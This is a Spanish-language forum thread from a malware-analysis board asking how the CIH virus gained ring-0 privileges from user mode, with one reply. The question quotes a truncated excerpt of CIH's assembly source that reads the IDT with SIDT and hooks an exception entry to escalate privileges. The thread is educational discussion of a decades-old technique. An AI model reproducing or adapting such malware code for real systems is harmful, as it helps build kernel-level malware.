elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Instruccion SIDT y el virus CIH.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Instruccion SIDT y el virus CIH.  (Leído 310 veces)
marax

Desconectado Desconectado

Mensajes: 122



Ver Perfil
Instruccion SIDT y el virus CIH.
« en: 9 Agosto 2020, 14:32 pm »

Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?:

Citar
MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ;
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

;...
En línea

"Durante diez años has venido a mi cueva: estarías harto de tu luz y de este camino sin mí, sin mi águila y sin mi serpiente."
el etrno

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Instruccion SIDT y el virus CIH.
« Respuesta #1 en: 6 Septiembre 2020, 04:32 am »

la respuesta corta el windows en los que cih sirve tiene mas hoyos de seguridad que un colador por lo que era posible saltarse ciertos controles y toquetear cosa con permisos de administrador y asta de sistema sin tener privilegios es similar a lo que se hace actualmente con la inyección dll solo que mas fácil no te preocupes por eso actualmente no se puede que yo recuerde
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Instrucción % en C++?
Programación General
.:UND3R:. 1 1,291 Último mensaje 17 Enero 2012, 16:49 pm
por pucheto
Instruccion if
Programación C/C++
BJM 3 1,060 Último mensaje 22 Octubre 2012, 17:48 pm
por rir3760
ayuda con instrucción
.NET (C#, VB.NET, ASP)
SγиtαxEяяoя 3 997 Último mensaje 6 Julio 2013, 07:22 am
por Eleкtro
Problema con instruccion
Programación General
nolasco281 2 862 Último mensaje 7 Mayo 2014, 18:45 pm
por nolasco281
Problema con instruccion
.NET (C#, VB.NET, ASP)
nolasco281 1 803 Último mensaje 28 Junio 2014, 06:51 am
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines